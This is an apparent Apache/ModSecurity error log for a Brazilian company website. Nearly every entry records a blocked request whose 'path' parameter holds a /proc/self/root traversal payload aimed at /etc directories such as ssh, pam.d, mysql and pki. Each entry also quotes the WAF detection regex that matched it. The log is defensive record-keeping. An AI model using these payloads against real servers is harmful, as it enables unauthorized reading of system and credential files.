[Wed Mar 18 12:16:16.695256 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:38548] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBwPu8EFLIOrSqIpsTYAAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:17.928811 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:38560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBwfu8EFLIOrSqIpsTZAAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:21.450671 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:38568] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBxew_le52K8_3pV3upgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:22.764553 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:40000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBxuw_le52K8_3pV3uqgAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:24.151908 2026] [:error] [pid 17653:tid 140411666392832] [client 74.7.243.128:40012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrByMdf6f5d65gmYZTkjQAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:25.450527 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:40028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBydY0UrI5A3LftIzAGgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:26.774565 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:40038] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrByuw_le52K8_3pV3utAAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:28.111159 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:40048] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBzNY0UrI5A3LftIzAHAAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:29.547816 2026] [:error] [pid 31803:tid 140411708356352] [client 74.7.243.128:56040] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrBzeyqAr6etmhZHNrTuwAAAEQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:35.004529 2026] [:error] [pid 19507:tid 140411725141760] [client 74.7.243.128:56042] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB0NY0UrI5A3LftIzAIQAAAYI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:36.646811 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.243.128:56046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB1Pu8EFLIOrSqIpsTdAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:36.867019 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:56046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB1Pu8EFLIOrSqIpsTdQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:38.200079 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:56050] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB1uoXxyEfFpUF8f99BQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:39.622972 2026] [:error] [pid 31803:tid 140411599251200] [client 74.7.243.128:60350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB1-yqAr6etmhZHNrTwAAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:40.999484 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:60354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB2Ow_le52K8_3pV3uvAAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:42.352447 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:60360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB2tY0UrI5A3LftIzAJAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:43.636722 2026] [:error] [pid 19507:tid 140411649607424] [client 74.7.243.128:60364] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB29Y0UrI5A3LftIzAJgAAAYs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:45.830872 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:60372] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB3OoXxyEfFpUF8f99BwAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:46.281934 2026] [mime_magic:error] [pid 19507:tid 140411708356352] (70014)End of file found: [client 57.141.18.109:41974] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 12:16:47.160039 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:60382] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB30zinOy1jxa1j4clugAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:48.448821 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:60392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB4Pu8EFLIOrSqIpsTgQAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:49.758056 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.243.128:47596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB4dY0UrI5A3LftIzALgAAAZc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 12:16:51.763287 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:47604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrB49a6ubjKNq_cu4arwQAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
